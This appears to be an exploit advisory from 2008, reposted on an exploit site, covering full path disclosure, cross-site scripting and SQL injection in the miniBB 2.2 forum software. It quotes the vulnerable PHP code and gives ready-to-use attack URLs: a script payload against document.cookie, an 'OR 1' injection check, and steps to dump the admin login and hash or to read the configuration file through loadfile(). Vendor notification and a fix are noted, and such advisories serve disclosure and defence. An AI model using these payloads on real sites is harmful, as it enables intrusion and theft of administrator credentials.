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miniBB 2.2 (CSS/SQL/FPD) Multiple Remote Vulnerabilities

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miniBB 2.2 (CSS/SQL/FPD) Multiple Remote Vulnerabilities

# Author:	__GiReX__
# Date:		21/04/2008

# CMS:		miniBB 2.2 (and maybe prior)
# Site:		minibb.net

# Bug 1:	Full Path Disclosure
# Bug 2:	Cross Site Scripting
# Bug 3:	Remote SQL Injection

# Need:		register_globals = On

# 21/04/2008  	Vendor informed
# 22/04/2008	miniBB 2.2a released (where they are fixed)
# 25/04/2008	Public advisory

# Bug 1: 	Full Path Disclosure

# Vuln Code:	bb_func_regusr.php

25. 	$languageDown=makeValuedDropDown($glang,'language');

# $glang is empty and it should be an array.
# So for get a full path disclosure into php warning:

# PoC:	[host]/[path]/index.php?action=registernew&glang=1

# Bug 2: 	Cross Site Scripting

# PoC:		[host]/[path]/index.php?action=registernew&glang[]=<script>alert(document.cookie)</script>

# Bug 3:	Remote SQL Injection

# Vuln Code:	setup_mysql.php
30.	function db_simpleSelect($sus,$table='',$fields='',$uniF='',$uniC='',$uniV='',$orderby='',$limit='',$uniF2='',	
42.	$xtr=(!isset($GLOBALS['xtr'])?'':$GLOBALS['xtr']);	
	$sql='SELECT '.$fields.' FROM '.$table.$where.' '.$xtr.' '.$groupBy.' '.$orderby.' '.$limit;
53.	elseif($sus==2){
	return mysql_result(mysql_query('SELECT '.$fields.' FROM '.$table.' '.$w.' '.$uniF.$uniC.$uniV.' '.$a.' '.$uniF2
	.$uniC2.$uniV2.' '.$xtr),0);

# The var $xtr is empty if getClForums() was not called.
# It can be overwritten to manipulate the SQL query if register_globals = On.

# Check Vuln:	[host]/[path]/index.php?action=userinfo&user=-1&xtr=OR+1

# If admin's profile is displayed, it's vulnerable!
# PoC:	 [host]/[path]/index.php?action=userinfo&user=-1

# Admin's login and hash will be displayed.
# These are default's tables and columns, they can be different, use information_schema to find them.
# Or with the path disclosure of Bug 1, you can try to loadfile() setup_options.php
# where there are stored database and admin's login in plain/text.

# PoC:   [host]/[path]/index.php?action=userinfo&user=-1

# Encode in Hex loadfile()'s parameter if magic_quotes_gpc = On

#  0day.today [2024-10-06]  #